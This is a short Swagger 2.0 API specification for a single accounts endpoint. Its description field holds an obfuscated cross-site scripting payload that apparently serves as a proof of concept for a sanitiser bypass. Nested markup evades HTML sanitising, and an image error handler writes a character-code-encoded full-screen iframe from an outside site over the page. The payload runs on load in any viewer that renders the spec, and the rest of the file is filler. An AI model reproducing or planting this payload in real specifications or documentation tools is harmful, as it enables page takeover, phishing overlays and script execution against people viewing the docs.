swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img/src/onerror=document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,47,47,115,112,97,103,104,101,116,116,105,45,111,104,110,101,45,119,97,115,115,101,114,46,103,105,116,104,117,98,46,105,111,47,105,110,100,101,120,46,104,116,109,108,34,32,115,116,121,108,101,61,34,112,111,115,105,116,105,111,110,58,102,105,120,101,100,59,32,116,111,112,58,48,59,32,108,101,102,116,58,48,59,32,98,111,116,116,111,109,58,48,59,32,114,105,103,104,116,58,48,59,32,119,105,100,116,104,58,49,48,48,37,59,32,104,101,105,103,104,116,58,49,48,48,37,59,32,98,111,114,100,101,114,58,110,111,110,101,59,32,109,97,114,103,105,110,58,48,59,32,112,97,100,100,105,110,103,58,48,59,32,111,118,101,114,102,108,111,119,58,104,105,100,100,101,110,59,32,122,45,105,110,100,101,120,58,57,57,57,57,57,57,59,34,62,60,47,105,102,114,97,109,101,62))>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
